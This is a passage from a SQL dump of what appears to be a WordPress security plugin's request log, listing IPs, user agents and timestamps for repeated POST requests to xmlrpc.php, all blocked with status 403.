Safari\\/537.36\"}','XMtvFxGYgITeS8DZUqRa9LJo',0,1681356803.6424,849,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','A0wy63LHupUrogPxJT7ZaQnD',0,1681356785.2376,637,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','i0gAqyfsQdNV9htPEcUMZjOl',0,1681356770.1024,640,'','POST',403,0,515,0,1,'',0),('185.221.182.129',3118315137,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','vLd0NSB6DaZcbi5C3Eh1juyW',0,1681356765.9739,1543,'','POST',403,0,515,0,1,'',0),('185.107.113.247',3110826487,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','UWpPjObTxA5zEJ140BLyXdh7',0,1681359295.0373,1359,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','6tiSDPvfXn2MqaGBLh9VyTZw',0,1681359280.9413,1100,'','POST',403,0,515,0,1,'',0),('139.59.120.161',2335930529,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','jV3FGC6N79HYhwIJxB0Ta5S1',0,1681359280.5380,1221,'','POST',403,0,515,0,1,'',0),('185.61.152.50',3107821618,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','vC4iHobfxYnQ2S06VdpeEGlj',0,1681359271.1397,573,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','SUjbtgqRCGe6Eh2K0wM1JiDT',0,1681359261.6169,2236,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','VmAYNt8jdJSfeIwC3GqihnH5',0,1681359262.5689,1292,'','POST',403,0,515,0,1,'',0),('185.104.44.58',3110612026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','fYyTxuFlNHRihjzCnIaM3UJ9',0,1681364338.5256,549,'','POST',403,0,515,0,1,'',0),('188.244.30.230',3170115302,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','E1zvM5HTxZpR9GAwmb7IdXN4',0,1681364327.8579,2886,'','POST',403,0,515,0,1,'',0),('173.201.191.100',2915680100,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','krNHbeMLUDdJQajlAYToqg8E',0,1681364326.6402,4103,'','POST',403,0,515,0,1,'',0),('72.167.87.12',1218926348,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','zGlqYahoXt65RnNiwmTuQ9Eb',0,1681364327.5432,3198,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','EIJAbgmtXYHl6jy2q79UWBz4',0,1681366105.2252,642,'','POST',403,0,515,0,1,'',0),('162.255.118.204',2734651084,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wOYIKVGej5CWQBuokNxqSb7p',0,1681366102.1507,602,'','POST',403,0,515,0,1,'',0),('134.209.95.37',2261868325,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','u3CvyxO8UgLjEB27TZKzrqma',0,1681366090.9092,742,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','w19p4XqgtIodlmDJAfZ5CacW',0,1681366078.0714,762,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','qRi7uyKVU8wHTksdG3XOfWbr',0,1681366075.3237,677,'','POST',403,0,515,0,1,'',0),('149.129.53.70',2508272966,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','W5XSsKMN7DdLtb3BprnA8VOz',0,1681366065.4826,3826,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','lcOa2fSXWLe8FC7NMI1y4HxG',0,1681370494.0253,3482,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','QJMXaxiCzqtRYcOlPnHKTsk7',0,1681369786.8819,615,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','6HEwUQrIiPbvAzn98dahTocJ',0,1681369786.1889,661,'','POST',403,0,515,0,1,'',0),('120.79.227.91',2018501467,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','Oqk9bidnpc6YyPIv3T0GK1el',0,1681369781.0429,567,'','POST',403,0,515,0,1,'',0),('185.2.4.114',3103917170,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','lQ78A2ZJRhWpnDFTsiBr4mXt',0,1681369773.5541,4618,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','x8SiCmwjKJVtaTydLoB7l0DI',0,1681369776.7517,1140,'','POST',403,0,515,0,1,'',0),('185.176.40.67',3115329603,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','njdyPD5rZ4qi928sLVzJTwHX',0,1681375527.9717,567,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','9Zrtug3hmQ8Eyo2GHnTL0sOl',0,1681375527.1601,648,'','POST',403,0,515,0,1,'',0),('192.99.19.65',3227718465,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','fZk6DdngG8RorUlNC4jYzyVv',0,1681375520.4255,625,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ktCaVZQbYPD1NGK3MqusmrI7',0,1681375512.1864,730,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','W7maSfb1dtN5uynJLxOTHsDl',0,1681375500.6564,1438,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','z9JBWK0SbgyLO42i3xMYAkVF',0,1681375510.7212,636,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','2grune1szY4ajX5mGSEb6BRv',0,1681375497.2626,4191,'','POST',403,0,515,0,1,'',0),('74.208.58.108',1255160428,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','ZioLV8vXgc3SwK4PA0OHE9RC',0,1681375497.4307,3196,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','HmdltcZaf7W3jLAXkGQoYnsw',0,1681378197.7524,714,'','POST',403,0,515,0,1,'',0),('3.220.31.73',64757577,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','8Mb4ICptRSTDYoBLh0xZ2PAN',0,1681378193.0416,1439,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','udphZRj1e7vgJ8LnADsHPxKm',0,1681378185.3997,663,'','POST',403,0,515,0,1,'',0),('212.23.66.162',3558294178,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','ZMIxm8wdbFPn45gAhOT1z7oG',0,1681378170.6257,630,'','POST',403,0,515,0,1,'',0),('209.126.6.155',3514697371,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','JBD9YwfyVZdR7LCIrSbtOM0h',0,1681378165.3998,4284,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','GLscvER2CtoIgA6PB5uWbK4D',0,1681378167.6571,1716,'','POST',403,0,515,0,1,'',0),('142.132.196.233',2391065833,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','ZXptcrRfsOBoqQ6N5LbaTWAP',0,1681376695.3414,1417,'','POST',403,0,515,0,1,'',0),('194.113.235.169',3262245801,'','http://cmdev-site1.com/2.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\",\"2\":\"http:\\/\\/cmdev-site1.com\\/2.php\"}','T9brj2pS4QesWyv65kNGcJMh',0,1681376694.8116,354,'','GET',403,0,700,0,1,'',0),('203.145.229.182',3415336374,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','BOdSFjNThW8xcfPQm1LAzwe2',0,1681376690.7195,1385,'','POST',403,0,515,0,1,'',0),('35.156.214.100',597481060,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','wdubeQsBJDpk8hClNco0zjMq',0,1681376679.4824,641,'','POST',403,0,515,0,1,'',0),('180.235.151.165',3035338661,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','0rzg69s5IaWo2AjvMBXxflQi',0,1681376677.5107,632,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','kN61VhjxyMJRzYWoUwiGaZDf',0,1681376671.1590,695,'','POST',403,0,515,0,1,'',0),('185.104.44.58',3110612026,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','rAXWlS4BVqGnzRbm2d8OIw9T',0,1681376661.1365,734,'','POST',403,0,515,0,1,'',0),('89.252.184.47',1509734447,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','r9KuVjzEIhUcwoZlBAOYt2Nb',0,1681376665.7417,631,'','POST',403,0,515,0,1,'',0),('14.225.255.250',249692154,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','kcRd4azBD3rPJombH6e7WIw5',0,1681382031.2342,575,'','POST',403,0,515,0,1,'',0),('159.223.60.241',2682207473,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','35WyIjmEOsXNKJSnrRBHoibt',0,1681382021.6079,3909,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','A9HF6ZDsRTCKYgdqv0uS4WiM',0,1681382022.8561,1888,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','rFjhd4zg76mcLEXYyeWlM5NC',0,1681382021.0995,3644,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','CHJBOmViLwYgXzfbP2NvyT5E',0,1681381625.6827,1254,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','nI7fNbRtXrjKUgHl9BQSOWpi',0,1681381608.3548,584,'','POST',403,0,515,0,1,'',0),('143.42.144.21',2401931285,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','HdUJejntuz92qkZYN6lOS1Dr',0,1681381607.5936,558,'','POST',403,0,515,0,1,'',0),('35.240.237.113',602991985,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','zbkxhTSRHt0v7qNiwa9fPymI',0,1681381600.3210,3540,'','POST',403,0,515,0,1,'',0),('13.65.80.107',222384235,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','RQLh9IN1MX76fd8GrVFPwqz4',0,1681386280.6381,556,'','POST',403,0,515,0,1,'',0),('143.42.144.21',2401931285,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','0KTlXJ8jwvxVsRSNoz6hu1Ep',0,1681384440.3160,585,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','lYoEMBIQjWqH0pmV3r4Kxsh1',0,1681384428.9746,574,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JtcG8vO5xFX7zbRdf1lPBhsK',0,1681384426.3470,618,'','POST',403,0,515,0,1,'',0),('182.50.132.78',3056763982,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','3k5etinshcUFGH7Pgo2VWvly',0,1681384422.3472,603,'','POST',403,0,515,0,1,'',0),('68.178.235.233',1152576489,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','Iw8G9r1gWl4hZENT7JUYdeOj',0,1681384411.3651,1056,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Uv5edG98RJXzYwu61AcbyQhq',0,1681384407.2240,1593,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','yznT5xYZ3potPMuNUgHQCe6K',0,1681384405.9814,2670,'','POST',403,0,515,0,1,'',0),('212.107.12.77',3563785293,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','J0uogMbAtjL4V19xBsW8OTzh',0,1681384404.1304,3378,'','POST',403,0,515,0,1,'',0),('74.208.167.173',1255188397,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','JaWrw0SZp6NyKsCmhIU7QY1b',0,1681384395.5767,5487,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','IMudZN4mKsTPxyOegEYtRakj',0,1681384401.4408,1270,'','POST',403,0,515,0,1,'',0),('68.178.224.245',1152573685,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','26v0ezKgGLUNIlxPdqJu1yCj',0,1681390845.2063,2554,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','jZ3UQqIpDTmPKMt4RHBdw1sa',0,1681389496.1836,589,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','z5BecZqA8IpOms9M3iSxgRHd',0,1681389490.7029,625,'','POST',403,0,515,0,1,'',0),('194.149.144.86',3264581718,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','heIsDgPQUayiEBoMH8nrRJ7Z',0,1681389488.3642,576,'','POST',403,0,515,0,1,'',0),('182.50.132.78',3056763982,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','kcqbTNVK8R3OIsmP4dASHDw1',0,1681389476.0847,581,'','POST',403,0,515,0,1,'',0),('212.23.66.162',3558294178,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','9D73obqF4LImPXrajOnAcKSe',0,1681389469.2221,596,'','POST',403,0,515,0,1,'',0),('54.238.227.127',921625471,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','59JCgvzMsV8aB7OpSIWlEhF3',0,1681389462.7479,608,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','Df3R7mJjScCHZ41NieOozUXu',0,1681389455.8622,3703,'','POST',403,0,515,0,1,'',0),('194.149.144.86',3264581718,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','CZgeI7KfR9atYucj3qVMy5Bh',0,1681389454.7967,4767,'','POST',403,0,515,0,1,'',0),('79.124.76.220',1333546204,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','LPbKCDrnXtTa4i1ozv7NO2Rw',0,1681389456.1581,2513,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','xpGf7hwZ8qOUCtJRc1IkaPjL',0,1681388418.5912,751,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','nZyUJs3KXrAvTL6oGQxwbYIq',0,1681388412.5954,642,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VfolZJvpAtbwda20e86SnIQD',0,1681388404.6953,2292,'','POST',403,0,515,0,1,'',0),('143.42.144.21',2401931285,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','hL1d2zry8FXSUg3YvfoxVMK5',0,1681388405.3874,1395,'','POST',403,0,515,0,1,'',0),('43.240.15.66',737152834,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) 